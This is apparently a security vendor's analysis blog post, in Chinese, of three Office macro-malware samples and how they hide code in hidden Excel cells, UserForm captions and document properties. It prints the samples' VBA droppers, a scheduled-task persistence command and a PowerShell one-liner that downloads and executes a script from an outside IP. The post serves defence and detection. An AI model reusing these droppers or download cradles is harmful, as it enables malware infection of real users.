0x00 簡介


作為一類古老的病毒,宏病毒隨著勒索軟件的興起而卷土重來。尤其是在2016年,以Locky為代表的勒索軟件利用Office宏肆虐傳播,宏病毒也成為目前最活躍的病毒品種之一。

在與安全軟件的對抗中,宏病毒使用了多種手段隱藏其惡意代碼或數據,近期出現的新變種則是利用Excel表格的函數動態生成PE文件數據、設置遠距離存放位置、隱藏顯示、不同表切換等方式進行隱藏。接下來,360QEX引擎團隊將對宏病毒代碼流行的三類“隱身術”進行逐一揭秘。

0x01 Excel表格隱藏數據


  • 樣本文件md5: 48f202f903741e7a1722bfa6b4c051aa.xls
  • sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7

virustotal 掃描結果:

p1

樣本對自身 VBAProject 進行了加密,

p2

破解之后,看到了宏代碼執行入口函數 Auto_Open,

#!vb
Sub Auto_Open()

On Error Resume Next
Application.DisplayAlerts = False
Dim WB As Workbook
Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
Set sh3 = WB.Sheets(3)
Dim str As String
str = Sh2.Cells(996, 40)
Dim t As Date
t = Now + TimeSerial(0, 0, 1)
Application.OnTime t, str

End Sub

病毒作者使用 Application.OnTime 函數,間隔 1 秒,執行 字符串 “str” ,”str” 的值是從表格 Cells(996, 40) 中獲取,當去查看表格中該處值時發現病毒更改了Excel單元格格式 ,把數據隱藏顯示。

單元格格式設置為三個 ;;; 時,單元格內容就會被隱藏。

p3

單元格的格式默認是顯示的,初始設置為,

p4

去掉隱藏后,查看表格中該值是 Fnslr12 , 即病毒的功能入口函數名稱,函數代碼為,

#!vb
Sub Fnslr12()

On Error Resume Next
Application.DisplayAlerts = False
Call Build
Sheets(1).Select
Dim WB As Workbook
Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)

If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
''' 以下省略

因此,該函數為病毒代碼的主功能函數。

此函數的功能有,

1、Call Build

調用 Build 函數, Build 函數功能為:在表格中動態生成,待寫入 可執行文件(pe文件)所需的數據,其功能代碼簡略如下,

#!vb
Sub Build()

Sheets(2).Select
Set WB = ActiveWorkbook
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)

'bob location
i = Sh2.Cells(1000, 12)
j = Sh2.Cells(1000, 13)

'index table location
R = Sh2.Cells(1000, 10)
C = Sh2.Cells(1000, 11)

Counter = R
Do While Sh2.Cells(Counter, C) <> ""

If Sh2.Cells(Counter, C + 1) <> "" Then
S1 = Sh2.Cells(Counter, C)
S2 = Sh2.Cells(Counter, C + 1)
End If
Counter = Counter + 1
Loop

Cells(i, j).Select
 Range(Selection, Selection.End(xlDown)).Select
Selection.Cut
Range("i1001").Select
ActiveSheet.Paste
Cells(1, 1).Select
End Sub

函數運行結果為,在 1001 行往下,依次每行填入數據。

p5

2、對是否運行過一次做檢查

#!vb
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If

當運行過一次之后, Cells(2,1) 表格會被寫入值,會在這里進入語句 Then ,執行 “Goto skyhigh” 語句, “skyhigh” 標記定位在函數尾部,即執行該語句后會退出該函數。

3

從代碼意圖猜測,病毒作者想在 %userprofile% AppDataRoamingMicrosoftTemplates 生成一個名為Macro1.vbs 的vbs文件 ,

#!vb
Dim Fnslr1 As String
    Dim Fnslr2 As String
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplatesMacro1.vbs"
    ChDrive (Fnslr2)
If Dir(Fnslr2) = "" Then
Else
End If

其中,病毒拼湊生成文件的目錄路徑時,從表格 2 的Cells(998, 40) 中讀取 ,該值為環境變量值 userprofile.

p6

只是,病毒作者并沒有繼續完善相關代碼。實際測試運行樣本也并沒有生成該文件,猜測可能作者后續加入該功能,或者該功能已經被取消。

4

%serprofile% AppDataRoamingMicrosoftTemplates 目錄生成可執行文件 Macro1.exe,

#!vb
Dim i As Double
i = 1000
    Fnslr1 = "Macro1.exe"
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
    Fnslr3 = FreeFile()
    Open Fnslr1 For Binary As Fnslr3
    Do While Sh2.Cells(i, 9) <> ""
            Fnslr11 = Sh2.Cells(i, 9)
        If (Fnslr9 = True) Then
            Fnslr8 = 1
            Do While (Fnslr8 < Len(Fnslr11))
                Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
                Put #Fnslr3, , Fnslr6 
                Fnslr8 = Fnslr8 + 3
            Loop
        End If
        If Fnslr9 = False Then
            Fnslr9 = True
        End If
         i = i + 1
    Loop
    Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
    Fnslr7 = Shell(Fnslr10, vbHide)
Dim i As Double
i = 1000
    Fnslr1 = "Macro1.exe"
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
    Fnslr3 = FreeFile()
    Open Fnslr1 For Binary As Fnslr3
    Do While Sh2.Cells(i, 9) <> ""
            Fnslr11 = Sh2.Cells(i, 9)
        If (Fnslr9 = True) Then
            Fnslr8 = 1
            Do While (Fnslr8 < Len(Fnslr11))
                Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
                Put #Fnslr3, , Fnslr6 
                Fnslr8 = Fnslr8 + 3
            Loop
        End If
        If Fnslr9 = False Then
            Fnslr9 = True
        End If
         i = i + 1
    Loop
    Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
    Fnslr7 = Shell(Fnslr10, vbHide)

寫入 Macro1.exe 所需的數據,從 Excel 表格中 Cells(997, 40) 周圍讀取,實際測試數據開始位置是 1001行,

p7

代碼尾部使用 Shell 函數,啟動生成的 Macro1.exe 。

文件信息

p8

可執行文件是 x64位的,功能是,啟動 powershell 附帶 –enc 參數,執行一段 shellcode ,這段 shellcode是一個 reverse shell ,連接黑客服務器,等待下達命令。

此部分與下面創建計劃任務不間斷運行的功能呼應起來,此部分不是本文重點,不再詳述。

5、

在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成 bat (cmd) 批處理腳本文件 Macro1.bat,

#!vb
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"

Dim User As String
User = Environ(Sh2.Cells(998, 40))
 Fname = Fnslr2 & "Macro1.bat"
FNum = FreeFile
Open Fname For Output Access Write As #FNum

WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "AppDataRoamingMicrosoftTemplates" & "Macro1.exe /ST 01:00"
 Print #FNum, WholeLine
Close #FNum

Dim TempFileName As String
TempFileName = Fnslr2 & "Macro1.bat"
Shell TempFileName, vbHide

尾部使用 Shell 函數 啟動該腳本,結果是在用戶機器創建了一個計劃任務, 每隔一小時運行一次 上面生成的 Macro1.exe 。

p9

6、彈窗顯示輸入密碼才能繼續進行運行

#!vb
pword = InputBox("Please enter a password to proceed", "Password Required", "*******")
  Select Case pword
  Case Is = ""
   MsgBox "Try Again"
    Case "Alon2016"
      RP = 1

     Case Is <> "Alon2016"
         MsgBox "Try Again"
  End Select

p10

從病毒代碼中知道,要求輸入的密碼是 “Alon2016” 。

7、

接下來是現場清理和掩飾,刪除調用Build 函數在表格生成的數據,在表格的開頭顯著位置填入在其他表格中保存的郵件收件人地址信息,

p11

小結:該樣本的特別之處有:

  1. PE文件數據是使用函數動態生成
  2. 數據存放在Excel表格中,使用隱藏顯示
  3. 數據存放位置很遠,不容易被看到
  4. 病毒在不同的excel表中切換,給分析人員調試VBA代碼增加困難
  5. 病毒運行完畢,清理現場,顯示郵件地址列表,掩飾自身

0x02 VBA User Form隱藏代碼


此類病毒把部分代碼隱藏到 VBA 工程中的 用戶控件(User Form)中,甚至把帶有代碼的控件最小化,使之不易被看到。

  • 樣本文件md5:9266db6c7772f6c45411ff3a591b1374
  • sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a

virustotal 掃描結果:

p12

查看該文件的宏,

p13

此文件看起來像是正常的SQL操作類的宏代碼,但是當我們查看窗體 Ultra 時發現,

p14

有個控件的Caption中存放了可疑數據如下,

#!bash
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)hendib00.00x00

此數據在宏代碼中被使用的位置為,

#!vb
CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")

其中,CadenaCurrency 是一個簡單的 Replace 調用,

#!vb
Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String
CadenaCurrency = Replace(A1, A2, A3)
End Function

解密方法是,

#!vb
Dim aproblems As String
 aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
 aproblems = CadenaCurrency(aproblems, "D!", "M")
 aproblems = CadenaCurrency(aproblems, "bri", "s")
 constans_problems = Split(aproblems, "10)")

解密為,

#!bash
Microsoft.XMLHTTP
Adodb.stream
shell.Application
Wscript.shell
Process
GeT
Temp
Type
open
write
responseBody
savetofile
hendibe.exe

幾個字符串呈現出非常明顯的意圖,下載(Microsoft.XMLHTTP)+ 寫文件(Adodb.stream)+ 執行(shell.Application / Wscript.shell)。

此樣本因為代碼有問題,沒能成功運行起來。找到宏代碼中使用 Microsoft.XMLHTTP 對象下載文件的位置,加上斷點調試,起先因為作者疏忽,忘記書寫一個雙引號,導致編譯失敗,

p15

之后,運行到下載文件處時,出現了報錯。

p16

0x03 文檔內建屬性隱藏代碼


此類病毒把代碼核心惡意部分放入文檔的內建屬性中。

  • 樣本文件md5:0ce81eda6b6886163cf5dadffecc0df9
  • sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd

virustotal 掃描結果:

p17

此樣本的vba 宏代碼只有1個文件,很簡短,

#!vb
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Call winshell
End Sub

Sub AutoOpen()
Call winshell
End Sub

Function winshell() As Object
    On Error Resume Next
    Err.Clear

    Dim ps As String
    ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value
    Dim Obj As Object
    Set Obj = CreateObject("WScript.Shell")
    Obj.Run ps, 0

Application.DisplayAlerts = False
End Function

響應兩個文檔打開事件,AutoOpen 與Auto_Open,直接執行 winshell函數, winshell函數讀取文件內建屬性,Manager 的值,直接執行起來。Manager值,我們使用右鍵文件屬性,查看為,

p18

#!powershell
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');

是一段 Powershell 執行的腳本代碼,從指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下載文件。目前測試此URL已經無法訪問。

0x04 總結


以加密勒索為代表的病毒,越來越多的使用Office宏,js,vbs等非Pe文件來傳播。通過腳本代碼動態向Windows 目錄中釋放可執行文件或者從服務器下載可執行文件。

非PE病毒查殺引擎QEX是 360安全產品中負責查殺宏病毒及vbs、js、html等腳本病毒的獨有引擎。上述樣本QEX引擎均已查殺。

在這里也提醒 Microsoft Office 文檔系列軟件的使用用戶,

  1. 如日常無使用宏的需求,請禁用 Office 宏,禁用方式參考

    https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12

  2. 對于經常使用宏工作的用戶,請安裝安全軟件,定期更新病毒庫,對于他人發送的文檔,在打開之前請先掃描。

0x05 Reference


您的支持將鼓勵我們繼續創作!

[微信] 掃描二維碼打賞

[支付寶] 掃描二維碼打賞